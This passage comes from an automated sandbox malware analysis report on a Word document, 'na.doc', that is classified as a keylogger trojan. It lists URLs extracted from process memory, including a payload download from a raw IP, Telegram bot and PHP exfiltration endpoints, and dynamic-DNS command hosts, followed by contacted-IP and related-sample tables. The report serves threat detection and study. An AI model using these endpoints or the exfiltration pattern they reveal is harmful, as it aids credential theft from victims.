                                              http://reallyfreegeoip.orgcmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002460000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002453000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000249C000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000248A000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002436000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000024AA000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000023BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000244A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://checkip.dyndns.comcmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002460000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002453000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000249C000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002443000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000023A2000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000248A000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002436000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000024AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://ocsp.entrust.net0Dcmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecmnjgyugo61000.exe, 00000005.00000002.414566324.00000000023E8000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002301000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://reallyfreegeoip.org/xml/cmnjgyugo61000.exe, 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000023A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://87.120.84.38/txt/CLLPdgxhnmwGf5Y.exeTEQNEDT32.EXE, 00000002.00000003.401554173.00000000005B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://crl.entrust.net/server1.crl0cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://87.120.84.38/txt/CLLPdgxhnmwGf5Y.exettC:EQNEDT32.EXE, 00000002.00000002.401749638.000000000058F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&icmnjgyugo61000.exe, 00000008.00000002.909020505.00000000034D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://87.120.84.38/txt/CLLPdgxhnmwGf5Y.exe8/EQNEDT32.EXE, 00000002.00000002.401749638.000000000058F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002594000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.000000000337B000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002581000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://reallyfreegeoip.org/xml/173.254.250.784cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002460000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002453000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000023E5000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000249C000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000248A000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002436000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000024AA000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000244A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://87.120.84.38/txt/CLLPdgxhnmwGf5Y.exejEQNEDT32.EXE, 00000002.00000002.401749638.000000000058F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://checkip.dyndns.orgcmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002396000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002460000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002453000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000023E5000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000249C000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000246E000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002443000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000023A2000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000248A000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002436000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000024AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchcmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002594000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.000000000337B000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002581000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000024B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://www.google.com/favicon.icocmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://aborters.duckdns.org:8081cmnjgyugo61000.exe, 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002301000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://ac.ecosia.org/autocomplete?q=cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002594000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.000000000337B000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002581000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://www.google.com/sorry/indexcmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.000000000341D000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.0000000003452000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000034D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://anotherarmy.dns.army:8081cmnjgyugo61000.exe, 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002301000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://87.120.84.38/txt/CLLPdgxhnmwGf5Y.exeC:EQNEDT32.EXE, 00000002.00000002.401749638.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.401554173.00000000005ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://reallyfreegeoip.orgcmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002460000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002453000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000023E5000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000249C000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000023A2000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000248A000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002436000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000024AA000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000244A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26acmnjgyugo61000.exe, 00000008.00000002.909020505.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000034D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://www.google.com/search?q=netcmnjgyugo61000.exe, 00000008.00000002.909020505.00000000034D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://www.google.com/sorry/indextestcmnjgyugo61000.exe, 00000008.00000002.909020505.0000000003462000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.000000000342A000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.0000000003516000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.0000000003408000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000034DE000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000034BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://api.telegram.orgcmnjgyugo61000.exe, 00000008.00000002.908507517.00000000024B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://secure.comodo.com/CPS0cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002594000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.000000000337B000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002581000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://crl.entrust.net/2048ca.crl0cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002594000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.000000000337B000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002581000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.909020505.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000025C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedcmnjgyugo61000.exe, 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                      		unknown

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      132.226.8.169
                                                                                      		unknownUnited States
                                                                                      		16989UTMEMUSfalse
                                                                                      149.154.167.220
                                                                                      		api.telegram.orgUnited Kingdom
                                                                                      		62041TELEGRAMRUtrue
                                                                                      188.114.97.3
                                                                                      		unknownEuropean Union
                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                      87.120.84.38
                                                                                      		unknownBulgaria
                                                                                      		51189SHARCOM-ASBGtrue
                                                                                      193.122.6.168
                                                                                      		unknownUnited States
                                                                                      		31898ORACLE-BMC-31898USfalse
                                                                                      188.114.96.3
                                                                                      		reallyfreegeoip.orgEuropean Union
                                                                                      		13335CLOUDFLARENETUStrue
                                                                                      158.101.44.242
                                                                                      		checkip.dyndns.comUnited States
                                                                                      		31898ORACLE-BMC-31898USfalse
                                                                                      132.226.247.73
                                                                                      		unknownUnited States
                                                                                      		16989UTMEMUSfalse

                                                                                      General Information

                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1545179
                                                                                      Start date and time:2024-10-30 08:13:04 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 8m 57s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                      Number of analysed new started processes analysed:13
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:na.doc
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.expl.evad.winDOC@9/14@26/8
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 66.7%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 99%
                                                                                      • Number of executed functions: 64
                                                                                      • Number of non-executed functions: 12
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .doc
                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                      • Attach to Office via COM
                                                                                      • Active ActiveX Object
                                                                                      • Scroll down
                                                                                      • Close Viewer
                                                                                      • Override analysis time to 74790.3642158095 for current running targets taking high CPU consumption
                                                                                      • Override analysis time to 149580.728431619 for current running targets taking high CPU consumption

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                      • Execution Graph export aborted for target EQNEDT32.EXE, PID 3308 because there are no executed function
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: na.doc

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      03:14:14API Interceptor318x Sleep call for process: EQNEDT32.EXE modified
                                                                                      03:14:19API Interceptor7330075x Sleep call for process: cmnjgyugo61000.exe modified
                                                                                      03:14:24API Interceptor28x Sleep call for process: powershell.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      132.226.8.169Quality stuff.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      z59IKE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      come.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      INVOICE.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      AWB#21138700102.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      149.154.167.220file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                        ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      Ndnownts.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        installer.exeGet hashmaliciousUnknownBrowse
                                                                                                          188.114.97.3lf1SPbZI3V.exeGet hashmaliciousLokibotBrowse
                                                                                                          • touxzw.ir/alpha2/five/fre.php
                                                                                                          Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                          • paste.ee/d/vdlzo
                                                                                                          Purchase_Order_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.bayarcepat19.click/g48c/
                                                                                                          zxalphamn.docGet hashmaliciousLokibotBrowse
                                                                                                          • touxzw.ir/alpha2/five/fre.php
                                                                                                          rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.launchdreamidea.xyz/2b9b/
                                                                                                          rPO_28102400.exeGet hashmaliciousLokibotBrowse
                                                                                                          • ghcopz.shop/ClarkB/PWS/fre.php
                                                                                                          PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                          • windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
                                                                                                          SR3JZpolPo.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                                          • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                                                          5Z1WFRMTOXRH6X21Z8NU8.exeGet hashmaliciousUnknownBrowse
                                                                                                          • artvisions-autoinsider.com/8bkjdSdfjCe/index.php
                                                                                                          PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.cc101.pro/4hfb/

                                                                                                          Domains

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          reallyfreegeoip.org ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 188.114.97.3
                                                                                                          File07098.PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 188.114.97.3
                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 188.114.97.3
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 188.114.97.3
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          z1MRforsteamDRUM-A1_pdf.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                          • 188.114.97.3
                                                                                                          checkip.dyndns.com ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          File07098.PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 193.122.130.0
                                                                                                          Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 193.122.6.168
                                                                                                          Quality stuff.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 158.101.44.242
                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 193.122.6.168
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 193.122.130.0
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          api.telegram.orgfile.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Ndnownts.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          installer.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 149.154.167.220

                                                                                                          ASNs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          TELEGRAMRUfile.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Ndnownts.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          installer.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 149.154.167.220
                                                                                                          CLOUDFLARENETUSPayment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
